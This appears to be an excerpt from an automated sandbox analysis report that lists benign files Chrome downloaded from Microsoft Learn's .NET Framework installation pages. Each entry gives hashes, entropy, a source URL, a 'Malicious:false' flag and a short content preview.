                                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):13842
                                                                                                                                                                                              Entropy (8bit):7.802399161550213
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                              MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                              SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                              SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                              SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                              Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):33148
                                                                                                                                                                                              Entropy (8bit):4.917595394577667
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                              MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                              SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                              SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                              SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):5644
                                                                                                                                                                                              Entropy (8bit):4.785769732002188
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                              MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                              SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                              SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                              SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
                                                                                                                                                                                              Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):64291
                                                                                                                                                                                              Entropy (8bit):7.964191793580486
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                              MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                              SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                              SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                              SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):35005
                                                                                                                                                                                              Entropy (8bit):7.980061050467981
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                                              MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                                              SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                                              SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                                              SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                                              Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):4897
                                                                                                                                                                                              Entropy (8bit):4.8007377074457604
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                              MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                              SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                              SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                              SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                              Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):64291
                                                                                                                                                                                              Entropy (8bit):7.964191793580486
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                                              MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                                              SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                                              SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                                              SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
                                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1817143
                                                                                                                                                                                              Entropy (8bit):5.501007973622959
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                              MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                              SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                              SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                              SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                              Size (bytes):1154
                                                                                                                                                                                              Entropy (8bit):4.59126408969148
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                                              MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                                              SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                                              SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                                              SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/media/logos/logo_net.svg
